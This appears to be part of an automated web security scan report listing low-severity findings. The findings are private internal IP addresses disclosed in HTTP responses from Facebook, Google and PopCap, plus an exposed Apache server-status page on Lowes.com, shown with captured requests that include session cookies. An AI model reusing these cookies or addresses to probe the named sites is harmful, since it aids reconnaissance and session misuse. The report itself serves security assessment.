GET /www/app_full_proxy.php?app=110284481587&v=1&size=z&cksum=43b97d766c485462268027bba48d3d11&src=http%3A%2F%2Fupload.contextoptional.com%2Fupload%2F20110630192500.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fhomedepot&width=256&colorscheme=light&show_faces=false&stream=true&header=false&height=395
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.62.30.37
X-Cnection: close
Content-Length: 5394
Cache-Control: public, max-age=30681885
Expires: Sun, 01 Jul 2012 19:20:49 GMT
Date: Tue, 12 Jul 2011 16:36:04 GMT
Connection: close

......JFIF.....`.`......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

20.8. http://platform.ak.fbcdn.net/www/app_full_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.185.48

Request

GET /www/app_full_proxy.php?app=237431116274613&v=1&size=z&cksum=740978cd5c2c78243bda02f934c3ba64&src=http%3A%2F%2Fupload.contextoptional.com%2Fupload%2F20110706184423.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fhomedepot&width=256&colorscheme=light&show_faces=false&stream=true&header=false&height=395
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.62.185.48
X-Cnection: close
Content-Length: 4520
Cache-Control: public, max-age=31354799
Expires: Mon, 09 Jul 2012 14:16:03 GMT
Date: Tue, 12 Jul 2011 16:36:04 GMT
Connection: close

......JFIF..............ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

20.9. http://platform.ak.fbcdn.net/www/app_full_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.219.65

Request

GET /www/app_full_proxy.php?app=110284481587&v=1&size=z&cksum=22c07a3289b017f3ccdf34643879402b&src=http%3A%2F%2Fupload.contextoptional.com%2Fupload%2F20110630194210.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fhomedepot&width=256&colorscheme=light&show_faces=false&stream=true&header=false&height=395
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.54.219.65
X-Cnection: close
Content-Length: 6095
Cache-Control: public, max-age=30768149
Expires: Mon, 02 Jul 2012 19:18:33 GMT
Date: Tue, 12 Jul 2011 16:36:04 GMT
Connection: close

......JFIF.....`.`......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

20.10. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/LHnm6CafkJe.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yK/r/LHnm6CafkJe.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.191

Request

GET /rsrc.php/v1/yK/r/LHnm6CafkJe.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?app_id=211603812203681&href&send=true&layout=standard&width=450&show_faces=false&action=recommend&colorscheme=light&font=arial&height=35
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 12 Jul 2011 20:13:16 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 177602
Vary: Accept-Encoding
Cache-Control: public, max-age=31520851
Expires: Wed, 11 Jul 2012 20:19:21 GMT
Date: Wed, 13 Jul 2011 00:31:50 GMT
Connection: close

/*1310502031,169776319*/

if (window.CavalryLogger) { CavalryLogger.start_js(["fbhRl"]); }

function hasArrayNature(a){return (!!a&&(typeof a=='object'||typeof a=='function')&&('length' in a)&&!('setI
...[SNIP]...

20.11. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/2YGnqSRbxUI.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ys/r/2YGnqSRbxUI.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.196

Request

GET /rsrc.php/v1/ys/r/2YGnqSRbxUI.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fhomedepot&width=256&colorscheme=light&show_faces=false&stream=true&header=false&height=395
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 05 Jul 2011 02:21:23 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 3770
Vary: Accept-Encoding
Cache-Control: public, max-age=30881304
Expires: Wed, 04 Jul 2012 02:44:27 GMT
Date: Tue, 12 Jul 2011 16:36:03 GMT
Connection: close

/*1309833808,169775556*/

.fbEmu .body .fbEmuLink{color:#333}
.fbEmu .body .fbEmuLink:hover{text-decoration:none}
.fbEmu .body a.signature{color:#3b5998;display:inline}
.fbEmu .body a.signature:hover{
...[SNIP]...

20.12. https://store.popcap.com/payment.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.popcap.com
Path:	/payment.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.4.48

Request

Response

20.13. http://www.facebook.com/ajax/connect/connect_widget.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.89.45

Request

GET /ajax/connect/connect_widget.php?__a=1&id=106485550030&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fhomedepot&width=256&colorscheme=light&show_faces=false&stream=true&header=false&height=395
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.54.89.45
X-Cnection: close
Date: Tue, 12 Jul 2011 16:35:56 GMT
Content-Length: 26731

for (;;);{"__ar":1,"payload":null,"css":["cU5Ej","5ax2n"],"js":["UQcat"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv>\\u003cul class=\\\
...[SNIP]...

20.14. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.89.57

Request

Response

20.15. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.124.30

Request

Response

20.16. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.164.60

Request

Response

20.17. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.77.33

Request

Response

20.18. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.91.65

Request

Response

20.19. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.132.57

Request

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/katango/id447742732?ls=1&mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

20.20. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.25.41

Request

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/charts/songs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

20.21. http://www.google.com/sdch/vD843DpA.dct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/sdch/vD843DpA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.31.196.197

Request

GET /sdch/vD843DpA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=PrTm1sPBV8WcGKUpX24DX5FxWwEiYnRIQG1U8UDSmVNfNlXO4RsMbeCllROY8jurLY0nQ0ao8uAFMmNgXjVJP4Qp83yBr8GEcfw9vqYyVe1aEd9Jnty9TfIHuCmfrKOA
If-Modified-Since: Fri, 08 Jul 2011 00:54:46 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Tue, 12 Jul 2011 14:04:29 GMT
Date: Tue, 12 Jul 2011 17:04:00 GMT
Expires: Tue, 12 Jul 2011 17:04:00 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 116591

Domain: .google.com
Path: /search

<!doctype html> <head> <title>re - Google Search</title> <script>window.google={kEI:"28555,29481,2966,29876,29881,29891,30035,30039,30058",kCSI:{e:"25907,4,29
...[SNIP]...
<a href="/search?hl=en&q=related: http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCN clk(this.href,'','','','1','','0CCk ')">
...[SNIP]...
<b>www.ahttp://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCN clk(this.href,'','','',' UBEBYwBg')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:www.edmunds.com/used-cars/+used+carNKvLeHS7sb0J:www.carsdirect.com/used_cars/search+used+car&hl=en&ct=clnk&gl=us&source=www.google.com','','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rectv.com/DTVAPP/content/contact_us+directKvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account+direct 4','AFQjCN clk(this.href,'','','','4',''
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: OJ7l3PBi2ywJ:www.usedcars.com/+used+carH75rMPosXksJ:www.cars.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car topics.nytimes.com/top/news/business/ &rct=j&sa=
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:4AUACFJFdYwJ:search.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &hl=en&ct=clnk&gl=us&source=www.google
...[SNIP]...
<a href="/search?hl=en&q=related:http://172.31.196.197:8888/search?q=cache: &cd= &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGclk(this.href,'','','','1','','0C QIDAG')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:_AF_a1pfx4YJ:www.craigslist.com/+o&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','',' clk(this.href,'','','','8',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','',' 9','AFQjCNFclk(this.href,'','','','9','','0C en.wikipedia.org
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNFclk(this.href,'','','','1rwt(this,'','','','1 cl
...[SNIP]...

20.22. https://www.lowes.com/server-status previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/server-status

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

172.16.248.14
172.16.248.34
172.16.248.35
172.16.248.36
172.16.248.37
172.16.248.38
172.16.248.39
172.16.248.40
172.16.248.41
172.16.248.42
172.16.248.43
172.16.248.44
172.16.248.45

Request

GET /server-status HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes; akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Date: Wed, 13 Jul 2011 00:22:43 GMT
Content-Length: 530503
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Wed, 13-Jul-2011 00:52:43 GMT
Set-Cookie: TS176ebc=936e6fbc66c52a9fac7acbba43744f7b1e934ce87edddaa24e1ce3f9; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for www.lowes.com</h1>

<dl><dt>Server Version: IBM_HTTP_Server
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.36</td>
